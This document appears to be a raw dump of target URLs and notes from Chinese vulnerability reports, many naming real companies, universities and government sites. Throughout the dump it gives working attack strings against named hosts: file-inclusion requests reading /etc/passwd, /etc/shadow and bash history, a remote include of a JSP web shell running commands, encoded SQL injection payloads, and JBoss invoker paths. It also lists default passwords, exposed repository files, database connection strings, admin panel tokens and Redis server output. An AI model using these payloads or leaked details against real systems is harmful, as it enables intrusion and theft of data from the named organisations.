http://**.**.**.**/ http://www.tio.3gp.fr/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/admin/用户名密码都是1 http://**.**.**.**/ http://**.**.**.**/admin/top.asp可以直接进后台查看 http://**.**.**.**/ http://**.**.**.**/admin/用户名密码都是a http://www.10086sin.pw/ http://zsyytjfdh.top/admin/top.asp http://**.**.**.**/ http://**.**.**.**/admin/top.asp http://**.**.**.**/ http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/admin/top.asp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.** https://github.com/hivencent/TestCase/blob/master/config/Settings.py https://www.wanglibao.com/ https://staging.wanglibao.com/ http://192.168.1.99:8000/ http://www.emaotai.cn/ www.emaotai.cn:90/zyd/Member/HyReg.aspx?khbh=20130523000007&op=2&ReturnPage=HyList2.aspx http://**.**.**.**/ http://**.**.**.**/newsDetail.php?id=35639 http://**.**.**.**/newsDetail.php?id=35639 http://www.enkj.com/jz/casedetails.asp?id=1 inurl:/snspam/homepage.asp http://**.**.**.**/snspam/homepage.asp http://**.**.**.**/snspam/lib/emldata.asp?act=emldata&emlfile=L2V0Yy9wYXNzd2Q%3D http://www.subject.sdu.edu.cn/passage/more1.php?bid=2 http://service.kj.hundsun.com/ https://github.com/fyx912/100code https://github.com/fyx912/100code/blob/bd611918670b68e5266215238d4d8e176002cf3d/100mshCloud/config/config.properties jdbc:mysql://203.195.137.179:3306/q8_db_public?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://192.168.40.48:3306/q8_db_public?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://106.3.227.246:3306/q8_db_public?useUnicode=true&characterEncoding=UTF-8 http://176.74.254.135/login/showLoginAction http://x.x.x.x/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**/view/srplatform/sysconfig/browser.jsp http://**.**.**.**:88/view/srplatform/sysconfig/browser.jsp http://hxlm.xmu.edu.cn http://hxlm.xmu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=test http://hxlm.xmu.edu.cn/plus/ajaxs.asp?action=GetRelativeItem&key=test%2525%2527%2529%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2531%252c%2532%252c%2575%2573%2565%2572%256e%2561%256d%2565%252b%2527%257c%2527%252b%2570%2561%2573%2573%2577%256f%2572%2564%2520%2566%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500 http://xxxx/Server/CmxItem.php?pgid=System_UpdateSave http://**.**.**.**/index.php/Index/news/id/19* http://**.**.**.**/admin/index.php/code mail.okcoin.com/crossdomain.xml http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700 http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916689 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916690 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916691 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916692 http://icorepams.pingan.com.cn/ebusiness/upingan/memberOrderDetail.html?orderID=916693 http://**.**.**.**/netrep/login.jsp http://**.**.**.**/news_read.aspx?PageType=honor&HorCategory=B&KeyId=00000000000000067053# http://**.**.**.**/tips.php?txtsearch=*&sub=&Language=traditional http://**.**.**.**/about.php?catid=1&Language=traditional inurl:/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://**.**.**.**/info_list.asp?style= http://www.oldssdpp.fudan.edu.cn http://www.oldssdpp.fudan.edu.cn/news1.asp?id=1503 http://www.oldssdpp.fudan.edu.cn/sabout.asp?lx=small&xclassid=1&id=11 http://st.octmami.com/wap/user/login http://27.115.100.242/wap/user/login http://st.octmami.com/wap/user/login http://manage.st.octmami.com/wap/user/login http://svn.octmami.com/wap/user/login http://test2.st.octmami.com/wap/user/login http://test.st.octmami.com/wap/user/login http://t.st.octmami.com/wap/user/login http://dev.st.octmami.com/wap/user/login http://1.st.octmami.com/wap/user/login http://3.st.octmami.com/wap/user/login http://s2.st.octmami.com/wap/user/login http://st.octmami.com/wap/user/login http://**.**.**.**/support.php?id=102 http://**.**.**.**/support.php?id=102 http://app.wandahotels.com/hotelprocess/membership/getMembershipList.action http://www.huozhan.com/ArticlesAction_query.do?cateID=69 site:http://**.**.**.**/login!login.action http://mall.tekism.cn/ http://www.huozhan.com:80/HelpAction_showNewsDeatil.do?areaCode=010BJ&newsId=8065 http://mail.sinochemsdfy.com/ http://**.**.**.**:801/OutPortal/OutPortalDetailView?messageid=86 http://**.**.**.**/Page/dypt.aspx?t_id=9 a.asp/3.jpg http://**.**.**.**:8080/admin-console/ http://**.**.**.**:8080//invoker/JMXInvokerServlet http://tzds.zhcw.com/home/plug.php?do=service http://yeyou.mop.com/payment/Alipay_Pay.aspx?code=Alipay daemon:xampp http://home.stocang.com/ www.stoscm.com https://github.com/hivencent/TestCase/blob/4edf196eaa2f9af745fec9b1c989d188f2049f90/wishchen/register100.py URL:http://203.171.237.78/login.jsp http://**.**.**.**/youyue/index-common?aid=8212&page=2 www.wanda.cn/www.wandafilm.com/www.baidu.com http://app.wanda.cn/KidsReport/OA/RevenueDailydlYueReport.aspx?cpname=%E5%8C%85%E5%A4%B4%E4%B9%90%E5%9B%AD&datee=2015%E5%B9%B402%E6%9C%88 http://project.kuxun.cn:8080/seeyon/index.jsp http://mail.faw.com.cn/ https://mail.midea.com http://**.**.**.**/main/model/newinfo/newinfo.do?infoId=10730 http://www.kkeye.com/jtest_test/Default.aspx http://**.**.**.**/点击标识链接 http://meet.htsc.com.cn/ http://meet.htsc.com.cn/solr/#/ http://1.85.40.239:8080/invoker/JMXInvokerServlet http://nfc.newchinalife.com/pxptpingshidayi/Register.aspx?oid=1000 http://nfc.newchinalife.com http://**.**.**.**/lzzx/zwdt/201503/t20150325_79612.htm http://**.**.**.**/detail.php?id=13597 http://**.**.**.**/detail.php?id=13597 http://pl.fh21.com.cn/subindex.php?catable=hospitalcat&catid=1&catname1=&catname2=&num=736&page=4&table=hospital http://huodong.fans.tcl.com/login.php这个登录位置是有验证码的 http://wooyun.org/bugs/wooyun-2015-0148934 http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001 http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001'and Tips:System http://oa.tianya.cn/login/LoginOperation.jsp?method=checkTokenKey&loginid=1999001'and'a'like'a http://www.17chang.com/.git/config https://**.**.**.**/register.html http://www.17chang.com/.git/config http://www.ddky.com/address/addConsignee.htm http://xss.gift/ddkycsrf.html http://**.**.**.**/front/bin/ptlist.phtml?Category=8087 http://**.**.**.**/front/bin/ptlist.phtml?Category=8087 http://139.219.1.83/ http://vmart.infoclouds.net/index.php?g=Home&m=Index&a=login http://**.**.**.**/acrms/jsp/Login.xhtml http://**.**.**.**/acrms/jsp/Login.xhtml http://**.**.**.**/adrareams/jsp/Login.xhtml http://reg.easou.com/ http://reg.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://reg.easou.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml http://reg.easou.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://**.**.**.**/helpsdangyecont.php?id=41 https://github.com/solo123 https://github.com/xpwiq168/luoha/blob/b457972b029b7ee0354fd5881bcfc4eee91424dc/logserver-app/src/main/resources/email.properties http://**.**.**.**/ http://**.**.**.**/vfs/tmp/upload/test.txt http://ftp.17chang.com http://**.**.**.**/news/detail.php?nt_pk=5&ns_pk=27830 http://**.**.**.**/news/detail.php?nt_pk=5&ns_pk=27830 https://www.tzbao.com/logon.html pass:123456 http://**.**.**.**/exoa/root.jsp http://test.pwel.com.cn http://**.**.**.**/ http://123.127.246.3:8001/lms/app/login/login.jsp http://123.127.246.3:81/存在目录遍历 http://xy.zhcw.com/front/searchCourseResult?page.currentPage=1&searchRequest=-1 http://xy.zhcw.com/front/searchCourseResult?page.currentPage=1&searchRequest=e http://**.**.**.**/show.asp?id=-1 http://**.**.**.**/成都理工 http://**.**.**.**/ http://**.**.**.**:8888/安阳工学院 http://**.**.**.**/ http://web.**.**.**.**:8080/car_getInfo.do?ram=0.3880515185000556&cid=872755 http://crm.17chang.com/ http://**.**.**.**/bugs/wooyun-2010-061930 http://**.**.**.**/nxdsy/ http://**.**.**.**/nxdsy/upfiles/news/test.asp http://**.**.**.**/i/main/login.jsp http://kaihu.yhqh.com.cn http://**.**.**.**/ http://wap.fcsc.com/wap.tar.gz http://app.zhcw.com http://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://202.108.24.133/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://192.168.11.33:8080/shell/shell.jsp?cmd=ifconfig http://**.**.**.**/newsinfo.aspx?id=240&nid=6 http://**.**.**.**/newsinfo.aspx?id=240&nid=6 https://www.xinxindai.com/user/iforgetpassword.html https://github.com/xvwenlin/aipugame https://github.com/xvwenlin/aipugame/blob/5d5bbaa49945b2581aaf02d8808930a648c5f6b4/aipu_dc/environments/prod/common/config/main-local.php mysql:host=10.66.130.240;dbname=aipu_dc http://**.**.**.**/include/bak/upload.jsp http://**.**.**.**/eWeb/GO/L_GO_List.asp?mgrup_cd=KUL56&s_year=2015&s http://**.**.**.**/eWeb/GO/L_GO_List.asp?mgrup_cd=KUL56&s_year=2015&s http://www.domyshop.com/ http://www.domyshop.com/user/foget.html http://www.ddsy.com http://area.ddky.com/order/view.htm http://area.ddky.com/desktop/view.htm https://pay.xiangshang360.com/xweb/bidding/list?period=180-1000&interest=13.0-1000.0&orderByCondition=&pageNum=1&_=1446837749753 http://passport.mgyun.com/UserCenter/Info# http://api.51yche.com/Activity/event/event_id/4 http://www.abc360.com/log.txt http://oa.tjjt.co/ http://www.openfind.com/taiwan/about.php http://host1.openfind.com.tw/.svn/entries http://blog.openfind.com.tw/.svn/entries http://**.**.**.**:9001/cas/login?service=http%3A%2F%2F**.**.**.**%3A9004%2F http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/install/index.jsp http://**.**.**.**/cK/ws.jsp,密码112120 http://**.**.**.**/wheretobuy/autocomplete http://121.14.3.150:8081/---黑名单管理系统 http://121.14.3.150:8081/blacklist.sql http://122.115.42.242/audit/index http://122.115.42.242/user/view?id=530 http://www.ziroom.com/ http://cms.ziroom.com/ http://www.ziroomapartment.com/ http://119.254.70.101:8000/homelinkcb/ http://huodong.homelink.com.cn/xinfang/.svn/entries https://mail.homelink.com.cn https://vpn.homelink.com.cn http://www.iapppay.com/phpmyadmin/#PMAURL-0:index.php?db=&table=&server=1&target=&token=442e73ffd35aa0247c0c28300195c3cb http://sys.iapppay.com/phpmyadmin/#PMAURL-3:sql.php?db=phpmyadmin&table=pma__userconfig&server=1&target=&token=7213a819c6efb2cce3280faeb7d05363 http://new.iapppay.com/phpmyadmin/#PMAURL-6:index.php?db=&table=&server=1&target=&token=dfbe679cd8ec7bb8bc6f2496dd31061a http://www.homelinkhr.com/view_initIndexPageForCustomer.action http://www.homelinkhr.com/one8.jsp http://www.homelinkhr.com/cmd.jsp jdbc:mysql://127.0.0.1/homelink?useUnicode=true&characterEncoding=utf8 http://www.homelinkhr.com/nei.jsp?http://10.20.6.4:80 http://www.homelinkhr.com/nei.jsp?http://10.20.6.5:80 http://www.homelinkhr.com/nei.jsp?http://10.20.6.6:80 http://www.homelinkhr.com/nei.jsp?http://10.20.6.11:80 http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080302 http://homelinktc.sinaapp.com/admin.php?type=modify&id=3 http://www.chinawutong.com/goq/getcommpinyin.ashx?ComName=1 www.chinawutong.com/ashx/clickcheline.ashx?CheLineID=1963370%20AND%203*2*1%3d6%20AND%20890%3d890&cust_id=1279006 www.chinawutong.com/fbhy.aspx?e=%CC%EC%BD%F2%CC%EC%BD%F2%20%BE%B2%BA%A3&id=522846&line=%f0''%f0%22%22&s=%B9 http://**.**.**.**/Home/Home/Login http://www.open.com.cn/search_studycenternew/1/1.html?\u0027 http://www.open.com.cn/search_studycenternew/1/0.html?\u0027\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0063\u006f\u006e\u0076\u0065\u0072\u0074\u0028\u0069\u006e\u0074\u002c\u0028\u0073\u0065\u006c\u0065\u0063\u0074\u002f\u002a\u002a\u002f\u0074\u006f\u0070\u002f\u002a\u002a\u002f\u0032\u0030\u002f\u002a\u002a\u002f\u006e\u0061\u006d\u0065\u002f\u002a\u002a\u002f\u0066\u0072\u006f\u006d\u002f\u002a\u002a\u002f\u0053\u0079\u0073\u004f\u0062\u006a\u0065\u0063\u0074\u0073\u002f\u002a\u002a\u002f\u0057\u0068\u0065\u0072\u0065\u002f\u002a\u002a\u002f\u0078\u0074\u0079\u0070\u0065\u003d\u0027\u0055\u0027\u002f\u002a\u002a\u002f\u0046\u004f\u0052\u002f\u002a\u002a\u002f\u0058\u004d\u004c\u002f\u002a\u002a\u002f\u0050\u0041\u0054\u0048\u0029\u0029\u003d\u0031\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0027\u0061\u0027\u006c\u0069\u006b\u0065\u0027 http://www.open.com.cn/search_studycenternew/1/0.html?\u0027\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0063\u006f\u006e\u0076\u0065\u0072\u0074\u0028\u0069\u006e\u0074\u002c\u0028\u0073\u0065\u006c\u0065\u0063\u0074\u002f\u002a\u002a\u002f\u0074\u006f\u0070\u002f\u002a\u002a\u002f\u0032\u0030\u002f\u002a\u002a\u002f\u006e\u0061\u006d\u0065\u002f\u002a\u002a\u002f\u0066\u0072\u006f\u006d\u002f\u002a\u002a\u002f\u0053\u0079\u0073\u004f\u0062\u006a\u0065\u0063\u0074\u0073\u002f\u002a\u002a\u002f\u0057\u0068\u0065\u0072\u0065\u002f\u002a\u002a\u002f\u0078\u0074\u0079\u0070\u0065\u003d\u0027\u0055\u0027\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u006e\u0061\u006d\u0065\u002f\u002a\u002a\u002f\u006c\u0069\u006b\u0065\u0027\u0025\u0075\u0073\u0065\u0072\u0025\u0027\u002f\u002a\u002a\u002f\u0046\u004f\u0052\u002f\u002a\u002a\u002f\u0058\u004d\u004c\u002f\u002a\u002a\u002f\u0050\u0041\u0054\u0048\u0029\u0029\u003d\u0031\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0027\u0061\u0027\u006c\u0069\u006b\u0065\u0027 http://www.open.com.cn/search_studycenternew/1/0.html?\u0027\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0063\u006f\u006e\u0076\u0065\u0072\u0074\u0028\u0069\u006e\u0074\u002c\u0028\u0073\u0065\u006c\u0065\u0063\u0074\u002f\u002a\u002a\u002f\u0074\u006f\u0070\u002f\u002a\u002a\u002f\u0031\u0030\u0030\u002f\u002a\u002a\u002f\u002a\u002f\u002a\u002a\u002f\u0066\u0072\u006f\u006d\u002f\u002a\u002a\u002f\u0053\u0079\u0073\u005f\u0043\u006f\u006e\u0066\u0069\u0067\u002f\u002a\u002a\u002f\u0057\u0068\u0065\u0072\u0065\u002f\u002a\u002a\u002f\u0031\u003d\u0031\u002f\u002a\u002a\u002f\u0046\u004f\u0052\u002f\u002a\u002a\u002f\u0058\u004d\u004c\u002f\u002a\u002a\u002f\u0050\u0041\u0054\u0048\u0029\u0029\u003d\u0031\u002f\u002a\u002a\u002f\u0061\u006e\u0064\u002f\u002a\u002a\u002f\u0027\u0061\u0027\u006c\u0069\u006b\u0065\u0027 https://**.**.**.**/product.php?id=1 http://**.**.**.**/DP/Sin/News.asp http://t.cn/RUUNjzh http://wooyun.org/bugs/wooyun-2015-0144551 http://www.iurp.ecnu.edu.cn/admin/index.asp www.pagoda.com.cn的同时发现www.bgyshop.com www.bgyshop.com(112.124.12.109)开svn果断尝试 http://www.ztemall.com/%E5%AE%A2%E6%88%B7/%E4%BF%AE%E6%94%B9 http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**//login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**//login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/passwd http://**.**.**.**/login.php?LOGIN_USER_INCLUDE=/etc/hosts http://.../images/database/admin.xml http://**.**.**.**/images/database/admin.xml http://**.**.**.**//images/database/admin.xml http://**.**.**.**/djwh/djwh-detel.asp?leibieid=5&pid=171 http://**.**.**.**/FxqStudent/Login.aspx http://202.96.191.150/ http://**.**.**.**/index.php?op=S&SID=39&PType=N http://**.**.**.**/index.php?op=S&SID=39&PType=N http://www.oppodigital.com.cn/showroom.php?act=get_store&sell_district_id=1 http://**.**.**.**/ http://**.**.**.**:81/ http://**.**.**.**/interface/ugo.php?OA_USER=username http://**.**.**.**:81/interface/ugo.php?OA_USER=yasq http://**.**.**.**/interface/ugo.php?OA_USER=jxy http://**.**.**.**:8000/interface/ugo.php?OA_USER=chenling http://**.**.**.**/interface/ugo.php?OA_USER=zhangpeng http://www.shizu.co/interface/ugo.php?OA_USER=hukang http://**.**.**.**/interface/ugo.php?OA_USER=wangjing http://**.**.**.**/trip/trip.asp?tno=62 http://**.**.**.**/trip/trip.asp?tno=62 http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO http://**.**.**.**/tch/Hotel/search/?action=city&code=TYO https://github.com/chenyunkuan/xiangshang-engine/blob/005709b07b511ecfba5a63e7638a33095b4f211a/etc/online/log4j.xml http://gps.chinawutong.com:80/ http://**.**.**.**/ http://oa.bjgold.com.cn http://oa.bjgold.com.cn/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/bugs/wooyun-2015-0142764 http://www.hillhouseacademy.com/,点击标识链接地址 http://182.92.98.150:8080/hillhouse/page!regedit.action存在命令执行漏洞 http://**.**.**.**/about.aspx?id=26 http://show.test.yoho.cn/admin/default/yoho http://**.**.**.**/s/1jGf0oFc http://task.baoxian.in/jira/login.jsp http://task.baoxian.in/jira/issues/?jql= http://www.srcc.ecnu.edu.cn/News_search.asp?key=s&otype=title&Submit=%CB%D1%CB%F7 http://**.**.**.**/ http://**.**.**.** http://www.opencom.cn/special/solution.php?id=14 http://**.**.**.**/page.php?no=10 http://**.**.**.**/ShowContext1.php?fm_no=AC01620 http://**.**.**.**/ http://**.**.**.**/certiInfo/index.php?item=cerHomePagexak01xcermni1xcer3348xcer1 http://app.wandahotels.com/hotelprocess/privilege/getPrivilegeList.action http://www.yhqh.com.cn/index.php?m=content&c=index&a=lists&catid=538) http://**.**.**.**/ http://**.**.**.**/Mall/Search?pi=1&type=0&keyword=* http://imcs.ecnu.edu.cn/MAIN/CompVisualizeBig.asp?id=12 http://fenxiao.lvmama.com/m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11 http://fenxiao.lvmama.com/m2c/2/list0.jsp?action=prodlist&view_id=lfsqwc&tree_id=0&sdate=2015-11-11 http://changyan.kuaizhan.com/bbs/board/topics/UNAUDIT/591 http://oa.xinxindai.com/ http://oa.xinxindai.com:80/weaver/weaver.email.FileDownloadLocation?fileid=30* http://oa.xinxindai.com/ http://oa.xinxindai.com/tools/SWFUpload/upload.jsp http://oa.xinxindai.com/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/new_list.asp?id=788 http://**.**.**.**/include/tpllib/ http://mail.xiangshang360.com/CVS/Root http://mail.xiangshang360.com/CVS/Entries http://rmp.haier.net/ items:6:number items:6:age items:6:evicted items:6:outofmemory items:7:number items:7:age items:7:evicted items:7:outofmemory items:8:number items:8:age items:8:evicted items:8:outofmemory http://**.**.**.**/manage/Checknews.aspx?Newsid=2435 http://202.108.103.169/ http://202.108.103.169/manage/login.action http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43 http://**.**.**.**/cpzx/info_3.aspx?itemid=35&lcid=43"-p http://area.ddky.com/order/view.htm http://wxtest.efunds.com.cn:8080//live800/存在live800客服系统。测试了下,任意下载的漏洞依旧存在 http://**.**.**.**/ReportSubmit/ http://**.**.**.**/ReportSubmit/ http://**.**.**.**/ReportSubmit/ http://**.**.**.**/ReportSubmit/ http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0153132 http://**.**.**.**/myinto/my_gift.php http://l.airchina.com.cn http://l.airchina.com.cn/servlet/qdbAction?cmd=start&stylesheet=..%2FWEB-INF%2Fweb.xml http://www.jahwa.com.cn/admin/login.aspx http://sso.99fund.com/robots.txt/1.php http://sns.99fund.com/robots.txt/1.php http://u.99fund.com/robots.txt/1.php http://sleb.learnnow.net.cn http://**.**.**.**/ https://passport.pptv.com/v3/login/login.do?format=jsonp&from=web_liveinter&cb=jQuery18309729133896209238_1447124954683&username=test&password=test&CheckboxSaveInfo=on&_=1447124971599 http://www.agrite.com.cn http://www.originseed.com.cn/news/view.php?id=894 http://huodong.chuchujie.com:80/20151111/ajax.php?category1=3&action=fgetGoods http://**.**.**.**/ http://moa.zte.com.cn/web.zip http://job.zte.com.cn/ http://mds.zte.com.cn/ postgres:passwd www.12hotpot.cn,crm.12hotpot.cn,eip.12hotpot.cn,然后看看登录口如:http://www.12hotpot.cn/member_modifyi_login.aspx,http://eip.12hotpot.cn/WebERP/DefaultLogin.aspx等。 http://t.cn/RUUNjzh http://**.**.**.**:81/ http://www.59.cn/member/cklogin.asp这个好像就是59互联的主站登录位置,登录的地方有验证码 http://bxapp.homelink.com.cn:1010/kc/login/login1/index.jsp http://218.56.16.62 http://**.**.**.**/login/Admin.aspx http://eln.tsingtao.com.cn http://eln.tsingtao.com.cn:8008/servlet/qdbAction?cmd=start&stylesheet=..%2FWEB-INF%2Fweb.xml http://eln.tsingtao.com.cn/servlet/qdbAction?cmd=start&stylesheet=..%2FWEB-INF%2Fweb.xml http://**.**.**.**中国大唐燃料调度中心,注册个账户,选择成为供应商,貌似这样能打到的注册过程中能写入XSS语句的地方随意发挥了 https://ebooking.ctrip.com/ebooking/EbookingLogin.aspx http://yilicmm.yili.com:7001/index.asp https://github.com/wangrui-spiderNet/HnProject/blob/8f28e44933def827c4b0cfb7d9b34e888451d470/WorkLife/src/com/hna/lmail/ui/activities/SplashActivity.java http://**.**.**.**/exoa/default.asp http://shangjia4.chuchujie.com/ http://210.14.138.145:82/ http://tempuri.org/IApi/SysteMtMailInfo http://202.108.103.191:8081/ http://202.108.103.191:8080/ http://202.108.103.191:8080//invoker/JMXInvokerServlet http://202.108.103.191:8081//invoker/JMXInvokerServlet http://campus.abic.cn http://123.56.117.57/Public/login http://cn.arsenal.com/player.php?id=4 http://oa.xinxindai.com/login/Login.jsp?logintype=1 http://121.15.6.114:9090/axis2/ http://58.220.10.243:8080/lanrch/index http://58.220.10.231/group1/M00/00/00/rKhhkVZBZIqAaq5TAAAAC8tN8z8483.txt http://**.**.**.**/myinto/order_text.php?doid=485634 http://www.boco.com.cn/boco/cn/news_0.asp?id=4441 http://www.etiandai.com:80/ www.etiandai.com https://www.bao.cn:443/ www.bao.cn http://**.**.**.**:9131/ecippss/存在SSRF漏洞,可探测内网主机开放端口。 http://www.doyouhike.net/s/route/?city_slug=&from=result&keyword=&page=1&route_type_id=10&tag_id= https://www.chujinsuo.com/page/p2p.web.guest/creditTransferList.html?page=4&sort=&desc= http://**.**.**.**/app/multinationaldialog/?a=detail&id=12_182 com:6379 redis_version:2.8.5 redis_git_sha1:00000000 redis_build_id:2593a0dfb605dcec redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.5 process_id:297410 run_id:247c8e85ced0ed1f1adec9158a1d7e7119e0b225 tcp_port:6379 uptime_in_seconds:594316 lru_clock:9633 http://campus.jumei.com http://campus.jumei.com:81 http://campus.jumei.com:9110/x https://campus.jumei.com mysqld:campus.jumei.com:6006 http://app.zhui.cn/usermanage/default.aspx http://219.143.69.58/ http://219.143.69.58/sys/index.php?m=structure&u=centerm&a=draw http://**.**.**.**:8088/register/RegCheckClientId.aspx?ClientId=1 http://**.**.**.**/IPAlarm/login.aspx http://**.**.**.**/PatentNet/Login.aspx http://**.**.**.**/login.aspx http://**.**.**.**/WebPublish/SystemManage/Admin_Main.aspx http://gongyi.homelink.com.cn/lianjia/portal/index http://www.podinns.com/ http://www.agrite.com.cn/.svn/entries http://tjsl.sdu.edu.cn/TestCenter/SubPage/list.php?ClassID=1 http://**.**.**.**:9080/home/index.action?storeId=13464&systemId=MINI%27&recStaff=dldxzqkhb http://**.**.**.**/zh-cn/shopping-mall-inner/?id=73 http://**.**.**.**/zh-cn/shopping-mall-inner/?id=73 index.php/welcome/ajax/article/view.html http://kszx.xmu.edu.cn:80/ https://**.**.**.**/domain/**.**.**.** http://**.**.**.**/ http://dts.cgnp.biz/ims4j/user!login.action http://cnoocgas-cz.com http://**.**.**.** http://**.**.**.**/case_class.asp?id=2&Menu=ChildMenu1 http://oa.robam.com/oa/login.asp http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm http://**.**.**.**/lang_trad/?o=multi&cnt=gethtm&file=images/20-30/20-30.htm http://chudan.ehuatai.com/login.jsp http://chudan.ehuatai.com/printPolicy.html?id=78093 http://**.**.**.**/tw/dtbrief/brief.html http://**.**.**.**/tw/b2b/Seminar/shwnws_new.asp?CnlID=18&cat=99&product_id=051981022&id=0000158370_U802M6VE8SZQ7NLWSW0IY http://**.**.**.**/tw/b2b/Seminar/shwnws_new.asp?CnlID=18&cat=99&product_id=051981022&id=0000158370_U802M6VE8SZQ7NLWSW0IY http://**.**.**.**/About_NewsContent.aspx?ReqID=273 http://**.**.**.**/About_NewsContent.aspx?ReqID=273 http://**.**.**.**/ http://noah.21tb.com/os/html/index.init.do http://**.**.**.**/search/search_dacx_result.asp http://**.**.**.** http://erds.chinawutong.com ftp://202.96.191.145 www.anpingdai.com)是深圳市安平盛金融服务有限公司旗下互联网金融平台,专注于互联网金融的创新,通过真实可靠的融资项目、透明公开的信息公示、合规合法的业务流程、完善严格的风控体系为广大投资人提供优质的金融服务。 https://www.anpingdai.com/index.php?s=/User/Index/recover.html http://tools.transn.com/tools/index.php?v=dialog&act=pdetail&pid=27&v= https://github.com/xuhande/webc/blob/0efa9e4a6739c092dfc6b4dbd716cafaafbc1023/App/Common/Conf/config.php http://gys.intime.com.cn/manager/inc/oracle.inc http://gys.intime.com.cn/department/db/oracle.inc 